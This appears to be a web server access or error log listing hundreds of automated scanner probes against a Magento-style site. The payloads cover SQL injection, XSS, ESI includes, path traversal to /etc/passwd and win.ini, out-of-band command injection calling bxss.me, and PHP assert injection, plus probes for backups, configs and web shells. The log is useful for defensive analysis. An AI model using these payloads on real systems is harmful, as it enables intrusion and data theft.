/acc'%20AND%202*3*8=6*8%20AND%20'mLgr'='mLgr/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/js/varien/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>sjVf(9763)<%2fScRiPt>/prototype/windows/themes/ 1 https://104.36.149.61/
/echo%20hjbxxi$()\\%20mhywwe\\nz^xyu||a%20%23'%20&echo%20hjbxxi$()\\%20mhywwe\\nz^xyu||a%20%23|\"%20&echo%20hjbxxi$()\\%20mhywwe\\nz^xyu||a%20%23/js/mage/adminhtml/browser.js 1 -
/acc/js/%3b(nslookup%20hitmgoslppnuvcef7f.bxss.me||perl%20-e%20\"gethostbyname('hitmgoslppnuvcef7f.bxss.me')\")|(nslookup%20hitmgoslppnuvcef7f.bxss.me||perl%20-e%20\"gethostbyname('hitmgoslppnuvcef7f.bxss.me')\")&(nslookup%20hitmgoslppnuvcef7f.bxss.me||per 1 -
/acc/index.php/install/wizard/config//../../../../../../../../windows/win.ini 2 -
/104.36.149.61-dump.zip 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/effects.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/editors/FCKeditor 2 -
/!(()&&!|*|*|/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
//index.php/install/wizard/config/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/install/default/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/validation.js 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>ll2Q(9504)<%2fScRiPt>/prototype/prototype.js 1 https://104.36.149.61/
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/default/css/iestyles.css 1 https://104.36.149.61/
/)/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/&echo%20jpkwel$()\\%20jgsbzv\\nz^xyu||a%20%23'%20&echo%20jpkwel$()\\%20jgsbzv\\nz^xyu||a%20%23|\"%20&echo%20jpkwel$()\\%20jgsbzv\\nz^xyu||a%20%23/js/mage/adminhtml/giftmessage.js 1 -
/)/js/varien/form.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/grid.js/972900%40 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/tooltip.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2fGemfile 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/index.php/install/wizard/config/ 1 -
/acc/js/prototype/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2fGemfile 1 -
/b9OVD2jo/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/wysiwyg/ 1 -
/dump.7z 1 -
/acc/js/..%2fprototype/tooltip.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/extended_debug.js 1 -
/-1%20OR%202+954-954-1=0+0+0+1/js/mage/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(116).concat(70).concat(118).concat(82)+(require\"socket\"%0aSocket.gethostbyname(\"hitlm\"+\"nkujttsu6e091.bxss.me.\")[3].to_s)+\"/index.php/install/wizard/config/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(107).concat(73).concat(111).concat(77)+(require'socket'%0aSocket.gethostbyname('hitfj'+'wirohjcr3f0f5.bxss.me.')[3].to_s)+'/js/prototype/validation.js 1 -
/'.gethostbyname(lc('hitkw'.'jufzsgfcb84af.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(68).chr(118).chr(66).'/skin/install/default/default/css/ie7minus.css 1 -
/cgi-bin/test.cgi 1 ()%20{%20Referer
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>JVyg(9886)<%2fScRiPt>/backup.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//./WEB-INF/web.xml%00.jsp 1 -
/bxss.me/js/prototype/validation.js 1 https://104.36.149.61/
/acc/index.php/12345'\"\\'\\\") 3 https://104.36.149.61/
/104db.tgz 1 -
/oNxgail0/index.php/install/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>ZcmW(9160)<%2fScRiPt>/mage/adminhtml/grid.js 1 https://104.36.149.61/
/admin/mysql/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/|(nslookup%20hitimcihjczhteb33a.bxss.me||perl%20-e%20\"gethostbyname('hitimcihjczhteb33a.bxss.me')\")/js/mage/adminhtml/image.js 1 -
/authenticationendpoint/shell.jsp 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/translate.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitpfvfaounnd39016.bxss.me||perl%20-e%20\"gethostbyname('hitpfvfaounnd39016.bxss.me')\")|(nslookup%20hitpfvfaounnd39016.bxss.me||perl%20-e%20\"gethostbyname('hitpfvfaounnd39016.bxss.me')\")&(nslookup%20hitpfvfaounnd39016.bxss.me||perl%2 1 -
/|echo%20uzggim$()\\%20ghtfqr\\nz^xyu||a%20%23'%20|echo%20uzggim$()\\%20ghtfqr\\nz^xyu||a%20%23|\"%20|echo%20uzggim$()\\%20ghtfqr\\nz^xyu||a%20%23/js/mage/adminhtml/wysiwyg/ 1 -
//database.inc 1 -
/!(()&&!|*|*|/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/css/reset.css 1 https://104.36.149.61/
/<!--/js/scriptaculous/effects.js 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/windows/themes/ 1 -
/acc/index.php//../../../../../../../../etc/passwd%00.jpg 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'GIWP'='GIWP/js/prototype/ 1 https://104.36.149.61/
/../../package.json 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/echo%20wkihpl$()\\%20hxactd\\nz^xyu||a%20%23'%20&echo%20wkihpl$()\\%20hxactd\\nz^xyu||a%20%23|\"%20&echo%20wkihpl$()\\%20hxactd\\nz^xyu||a%20%23/js/prototype/validation.js 1 -
/'.gethostbyname(lc('hitgp'.'ovzswzom1fa60.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(73).chr(98).chr(69).'/js/mage/adminhtml/hash.js 1 -
/acc/skin/install/default/default/css/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f.css 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/sales/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/translate.js 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/js.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'z8V8'='z8V8/js/varien/form.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/image.js 1 -
/tomcat/host-manager/text/ 1 -
/acc/.%2fjs/mage/adminhtml/grid.js 1 https://104.36.149.61/
/adminer-4.2.5-mysql-en.php 1 https://104.36.149.61/
/|echo%20uystdg$()\\%20fxkiwr\\nz^xyu||a%20%23'%20|echo%20uystdg$()\\%20fxkiwr\\nz^xyu||a%20%23|\"%20|echo%20uystdg$()\\%20fxkiwr\\nz^xyu||a%20%23/skin/adminhtml/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/ 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/tooltip_manager.js 1 https://104.36.149.61/
/acc//mage/adminhtml/backup.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/prototype/validation.js 1 https://104.36.149.61/
/${10000062+9999924}/js/mage/adminhtml/product/ 1 -
/adminer-4.6.1-mysql-en.php 1 https://104.36.149.61/
/response.write(9777240*9340419)/index.php/install/wizard/locale/ 1 -
/acc/js/..%2fmage/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/varien/1%00%c0%a7%c0%a2%252527%252522.js 1 https://104.36.149.61/
/$(nslookup%20hitztcqwwghtc4659e.bxss.me||perl%20-e%20\"gethostbyname('hitztcqwwghtc4659e.bxss.me')\")/skin/adminhtml/default/ 1 -
/acc/skin/install/default/1some_inexistent_file_with_long_name%00.jpg/css/boxes.css 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'22FW'='22FW/skin/install/default/default/ 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/${dirname}.sublime-workspace 1 -
/acc/js/mage/%2fxfs.bxss.me/sales/ 1 -
/acc/skin/install/..%2fdefault/default/ 1 https://104.36.149.61/
/&echo%20ijchgi$()\\%20tvjwcm\\nz^xyu||a%20%23'%20&echo%20ijchgi$()\\%20tvjwcm\\nz^xyu||a%20%23|\"%20&echo%20ijchgi$()\\%20tvjwcm\\nz^xyu||a%20%23/js/mage/adminhtml/browser.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/sales/ 1 -
/&echo%20nwylbr$()\\%20nscfmd\\nz^xyu||a%20%23'%20&echo%20nwylbr$()\\%20nscfmd\\nz^xyu||a%20%23|\"%20&echo%20nwylbr$()\\%20nscfmd\\nz^xyu||a%20%23/js/prototype/tooltip_manager.js 1 -
/MT1GOBvh'))%20OR%20720=(SELECT%20720%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/SPCQF7S8'))%20OR%20555=(SELECT%20555%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/-1%20OR%203+278-278-1=0+0+0+1/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/config/database.yml 1 -
/'+response.write(9229203*9108783)+'/js/mage/ 1 -
/3nTTrxWR'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/`(nslookup%20hitqlbayqopfiaf8dd.bxss.me||perl%20-e%20\"gethostbyname('hitqlbayqopfiaf8dd.bxss.me')\")`/js/mage/adminhtml/form.js 1 -
/http://bxss.me/t/fit.txt%3F.jpg/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/ 1 -
/${@print(md5(31337))}/js/prototype/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/translate.js 1 https://104.36.149.61/
/8a7u8Ji4'%20OR%20588=(SELECT%20588%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/echo%20mymgoa$()\\%20ddcmed\\nz^xyu||a%20%23'%20&echo%20mymgoa$()\\%20ddcmed\\nz^xyu||a%20%23|\"%20&echo%20mymgoa$()\\%20ddcmed\\nz^xyu||a%20%23/js/mage/translate.js 1 -
/^(%23$!@%23$)(()))******/skin/frontend/ 1 https://104.36.149.61/
/104-backup.zip 1 -
/acc'||'/js/prototype/validation.js 1 https://104.36.149.61/
/-1%20OR%203+252-252-1=0+0+0+1/skin/frontend/ 1 https://104.36.149.61/
/acc/index.php/install/wizard'\"()&%25<acx><ScRiPt%20>6DR8(9535)<%2fScRiPt>/locale/ 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitxl\".\"nfldrupif9eba.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(103).chr(68).chr(115).chr(75).\"/js/mage/adminhtml/wysiwyg/ 1 -
/dump.tar.gz 1 -
/104-db.sql 1 -
/api/system/deviceinfo 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js/..%2fprototype/prototype.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'rTQe'!='rTQe%25/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/product/ 1 -
//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 -
/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php 1 -
/acc/index.php//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
/acc/js/%3b(nslookup%20hitsoyuppivwd34fd8.bxss.me||perl%20-e%20\"gethostbyname('hitsoyuppivwd34fd8.bxss.me')\")|(nslookup%20hitsoyuppivwd34fd8.bxss.me||perl%20-e%20\"gethostbyname('hitsoyuppivwd34fd8.bxss.me')\")&(nslookup%20hitsoyuppivwd34fd8.bxss.me||per 1 -
/acc'||'/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/frontend/ 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'yJ9o'='yJ9o/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/form.js 1 -
/acc/js/mage/%2fxfs.bxss.me/giftmessage.js 1 -
/'\"()&%25<acx><ScRiPt%20>yxiC(9291)<%2fScRiPt>/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
//..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd 1 -
/'+'A'.concat(70-3).concat(22*4).concat(101).concat(70).concat(116).concat(80)+(require'socket'%0aSocket.gethostbyname('hitzg'+'voncputj655a5.bxss.me.')[3].to_s)+'/js/mage/adminhtml/uploader/ 1 -
/cgi-sys/entropysearch.cgi 1 ()%20{%20Referer
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/varien/js.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/varien/js.js 1 -
/'+'A'.concat(70-3).concat(22*4).concat(111).concat(90).concat(107).concat(70)+(require'socket'%0aSocket.gethostbyname('hitrh'+'htfetpva3d29c.bxss.me.')[3].to_s)+'/js/mage/adminhtml/events.js 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'OElh'!='OElh%25/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/form.js 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/prototype/windows/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>sjVf(9264)<%2fScRiPt>/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/adm/fckeditor 2 -
/-1%20OR%203+97-97-1=0+0+0+1/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 1 -
/bxss.me%2ft%2fxss.html%3f%2500/index.php/install/wizard/locale/ 1 -
/acc/js/mage/.%2fadminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/mage/directpost.js/914044%40 1 https://104.36.149.61/
/'\"/skin/adminhtml/ 1 -
/pentaho/api/userrolelist/systemRoles 1 -
/adminer-4.6.2-mysql.php 1 https://104.36.149.61/
/-1%20OR%203+901-901-1=0+0+0+1/skin/install/default/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'759g'!='759g%25/skin/install/default/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/tooltip_manager.js 1 https://104.36.149.61/
/database.yml~ 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/ 1 -
/app/config/database.yml~ 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/events.js 1 -
/acc/skin/install/default/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/clears.css 1 -
/cgi-bin/.psql_history 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/<!--/skin/frontend/ 1 -
/acc/index.php/install/wizard/locale//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/acc/js/%2fxfs.bxss.me/extended_debug.js 1 -
/acc/index.php/install/wizard/locale//../../../../../../../../etc/passwd%00.jpg 1 -
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>eCQQ(9218)<%2fScRiPt>/default/css/clears.css 1 https://104.36.149.61/
/c9tE9OY9')%20OR%20224=(SELECT%20224%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../WEB-INF/web.xml%00.jsp 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(116).concat(77).concat(106).concat(80)+(require\"socket\"%0aSocket.gethostbyname(\"hitrx\"+\"bfdmjxxu2eff8.bxss.me.\")[3].to_s)+\"/js/prototype/tooltip_manager.js 1 -
//js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/backup.js 1 -
/acc/js/scriptaculous/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc//mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/sales/ 1 https://104.36.149.61/
/acc/js/prototype/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/themes/ 1 https://104.36.149.61/
/admin/FCKeditor 2 -
/echo%20obzfrl$()\\%20jdzzvf\\nz^xyu||a%20%23'%20&echo%20obzfrl$()\\%20jdzzvf\\nz^xyu||a%20%23|\"%20&echo%20obzfrl$()\\%20jdzzvf\\nz^xyu||a%20%23/js/mage/adminhtml/product/ 1 -
/acc/%3b(nslookup%20hitryfmaxoygl2ca6b.bxss.me||perl%20-e%20\"gethostbyname('hitryfmaxoygl2ca6b.bxss.me')\")|(nslookup%20hitryfmaxoygl2ca6b.bxss.me||perl%20-e%20\"gethostbyname('hitryfmaxoygl2ca6b.bxss.me')\")&(nslookup%20hitryfmaxoygl2ca6b.bxss.me||perl%2 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/product/ 1 https://104.36.149.61/
/s2ANBSae'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/adminhtml/default/ 1 https://104.36.149.61/
/.htaccess~ 1 -
/acc/skin/install/default/1some_inexistent_file_with_long_name%00.jpg/css/clears.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/skin/install/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/css/iestyles.css 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/ 1 https://104.36.149.61/
/\"+response.write(9923192*9052317)+\"/js/mage/adminhtml/giftmessage.js 1 -
//../../WEB-INF/web.xml 1 -
/acc/js/mage/adminhtml/rules.js/902499%40 1 https://104.36.149.61/
/acc/skin/install/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../WEB-INF/web.xml%00.jsp 1 -
/acc/js/mage/adminhtml/variables.js/954777%40 1 https://104.36.149.61/
/mOnZOBeV'))%20OR%20256=(SELECT%20256%20FROM%20PG_SLEEP(15))--/js/varien/js.js 1 https://104.36.149.61/
/nacos/v1/auth/users/ 1 -
/4M65c9Su'))%20OR%20249=(SELECT%20249%20FROM%20PG_SLEEP(15))--/js/prototype/extended_debug.js 1 https://104.36.149.61/
/104_backup.sql.tar 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/default/css/reset.css 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/validation.js 1 -
/@@Zhsa7/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/browser.js 1 -
/104-db.tar.gz 1 -
/util/barcode.php 1 -
/acc/index.php//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/Public/home/js/check.js 1 -
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/ 1 -
/acc/js/mage/adminhtml/flexuploader.js/957571%40 1 https://104.36.149.61/
/acc/js/mage/%3b(nslookup%20hitmozonhxusk183e1.bxss.me||perl%20-e%20\"gethostbyname('hitmozonhxusk183e1.bxss.me')\")|(nslookup%20hitmozonhxusk183e1.bxss.me||perl%20-e%20\"gethostbyname('hitmozonhxusk183e1.bxss.me')\")&(nslookup%20hitmozonhxusk183e1.bxss.me 1 -
/authenticationendpoint/ss.jsp 1 -
/\".gethostbyname(lc(\"hitro\".\"tycugzqmc1bb6.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(105).chr(72).chr(109).chr(79).\"/js/prototype/prototype.js 1 -
/(nslookup%20hitgafwxdosqd694e9.bxss.me||perl%20-e%20\"gethostbyname('hitgafwxdosqd694e9.bxss.me')\")/js/varien/form.js 1 -
/%3b(nslookup%20hitogompmiyoy04425.bxss.me||perl%20-e%20\"gethostbyname('hitogompmiyoy04425.bxss.me')\")|(nslookup%20hitogompmiyoy04425.bxss.me||perl%20-e%20\"gethostbyname('hitogompmiyoy04425.bxss.me')\")&(nslookup%20hitogompmiyoy04425.bxss.me||perl%20-e% 1 -
/acc/js/mage/12345'\"\\'\\\") 17 https://104.36.149.61/
/console/images/%252e%252e%252f/console.portal 1 -
/'.gethostbyname(lc('hitiz'.'mtqglgmc7ecff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(66).chr(117).chr(65).'/js/mage/adminhtml/browser.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/validation.js 1 https://104.36.149.61/
/%3b(nslookup%20hitbeihbuqppq7fa14.bxss.me||perl%20-e%20\"gethostbyname('hitbeihbuqppq7fa14.bxss.me')\")|(nslookup%20hitbeihbuqppq7fa14.bxss.me||perl%20-e%20\"gethostbyname('hitbeihbuqppq7fa14.bxss.me')\")&(nslookup%20hitbeihbuqppq7fa14.bxss.me||perl%20-e% 1 -
/acc/index.php/install/wizard/beginPost//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/ 1 https://104.36.149.61/
/acc/js/prototype/debug.js/925412%40 1 https://104.36.149.61/
/cgi-bin/.history 1 -
/%3b(nslookup%20hitoevhsdxiss305e0.bxss.me||perl%20-e%20\"gethostbyname('hitoevhsdxiss305e0.bxss.me')\")|(nslookup%20hitoevhsdxiss305e0.bxss.me||perl%20-e%20\"gethostbyname('hitoevhsdxiss305e0.bxss.me')\")&(nslookup%20hitoevhsdxiss305e0.bxss.me||perl%20-e% 1 -
/acc/js/mage/adminhtml/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'2duZ'!='2duZ%25/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/translate.js 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/effects.js 1 https://104.36.149.61/
/cgi-bin/${dirname}.sublime-workspace 1 -
/js/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/104-db.zip 1 -
/acc/index.php//../../../../../../../../windows/win.ini%00en 1 -
/IshLqfns')%20OR%20749=(SELECT%20749%20FROM%20PG_SLEEP(15))--/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/default/ 1 https://104.36.149.61/
/(nslookup%20hitbgsmmxvlyx0126c.bxss.me||perl%20-e%20\"gethostbyname('hitbgsmmxvlyx0126c.bxss.me')\")/js/mage/adminhtml/image.js 1 -
/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/css/reset.css 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/default/ 1 https://104.36.149.61/
/acc/index.php//../../../../../../../../windows/win.ini%00.jpg 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/image.js 1 https://104.36.149.61/
/mgmt/tm/util/bash 1 -
/%3b(nslookup%20hitbaqersllsh4089f.bxss.me||perl%20-e%20\"gethostbyname('hitbaqersllsh4089f.bxss.me')\")|(nslookup%20hitbaqersllsh4089f.bxss.me||perl%20-e%20\"gethostbyname('hitbaqersllsh4089f.bxss.me')\")&(nslookup%20hitbaqersllsh4089f.bxss.me||perl%20-e% 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/scriptaculous/effects.js 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/hash.js 1 -
